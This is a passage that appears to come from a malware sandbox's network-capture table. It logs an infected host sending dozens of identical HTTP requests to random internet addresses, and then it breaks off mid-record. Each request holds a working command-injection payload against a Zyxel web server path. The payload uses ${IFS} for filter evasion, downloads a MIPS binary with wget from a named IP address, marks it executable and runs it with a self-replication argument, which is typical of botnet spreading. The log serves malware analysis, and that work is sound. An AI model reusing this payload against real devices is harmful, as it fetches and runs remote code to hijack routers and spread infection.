                                                      Feb 2, 2024 06:36:08.982304096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8321192.168.2.144539866.132.131.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982342958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8322192.168.2.1459278102.182.190.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982374907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8323192.168.2.145557483.23.222.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982404947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8324192.168.2.144266494.166.244.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982461929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8325192.168.2.145205869.118.109.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982506990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8326192.168.2.143814431.14.159.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982536077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8327192.168.2.14500025.113.53.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982587099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8328192.168.2.1460004138.191.228.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982636929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8329192.168.2.1455588184.18.229.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982673883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8330192.168.2.14558709.115.39.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982706070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8331192.168.2.144658436.92.174.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982743979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8332192.168.2.1448146155.104.153.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982769966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8333192.168.2.1444570178.125.137.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982820988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8334192.168.2.145765086.36.173.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982860088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8335192.168.2.1454618164.116.182.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982896090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8336192.168.2.143548897.252.235.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982923031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8337192.168.2.1445112150.174.254.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982969999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8338192.168.2.143684498.73.87.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983015060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8339192.168.2.145234670.127.252.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983061075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8340192.168.2.1446584208.21.19.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983086109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8341192.168.2.1445888121.164.24.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983119965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8342192.168.2.1439466141.192.142.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983164072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8343192.168.2.1450196179.56.221.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983207941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8344192.168.2.145131881.65.177.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983258009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8345192.168.2.145557013.205.25.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983305931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8346192.168.2.144453627.24.39.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983338118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8347192.168.2.1451646177.226.163.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983391047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8348192.168.2.1443352107.241.132.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983423948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8349192.168.2.1446614124.144.220.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983443022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8350192.168.2.144669461.120.100.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983488083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8351192.168.2.14554068.20.92.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983524084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8352192.168.2.1447542121.37.135.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983565092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8353192.168.2.1451746113.90.183.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983613968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8354192.168.2.1458026167.225.151.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983653069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8355192.168.2.1441320185.77.57.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983685017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8356192.168.2.1444850142.33.53.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983730078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8357192.168.2.1435882199.219.209.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983784914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8358192.168.2.1457860171.108.32.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983805895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8359192.168.2.1453154221.178.188.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983843088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8360192.168.2.1436954103.217.205.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983891010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8361192.168.2.1452146165.107.167.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983928919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8362192.168.2.1454512222.226.9.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.983958960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8363192.168.2.144264460.32.135.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984009027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8364192.168.2.1457498217.32.249.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984025002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8365192.168.2.145120082.38.197.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984066010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8366192.168.2.1450420187.11.12.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984133005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8367192.168.2.14486521.81.48.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984162092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8368192.168.2.1457844155.255.23.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984189987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8369192.168.2.1439916115.32.186.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984239101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8370192.168.2.143756257.150.56.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984282970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8371192.168.2.1454536184.93.126.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984328032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8372192.168.2.1445530157.7.38.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984361887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8373192.168.2.145001297.225.86.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984412909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8374192.168.2.1454524153.128.23.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984441996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8375192.168.2.14429682.162.205.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984494925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8376192.168.2.1436510186.160.207.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984524012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8377192.168.2.14448621.238.110.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984576941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8378192.168.2.1447690132.140.70.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984611034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8379192.168.2.1450594182.155.72.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984647036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8380192.168.2.1434002125.20.177.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984684944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8381192.168.2.1447194139.98.198.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984735966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8382192.168.2.1445638175.253.9.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984787941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8383192.168.2.1442424105.250.151.68443
                                                      TimestampBytes transferredDirectionData
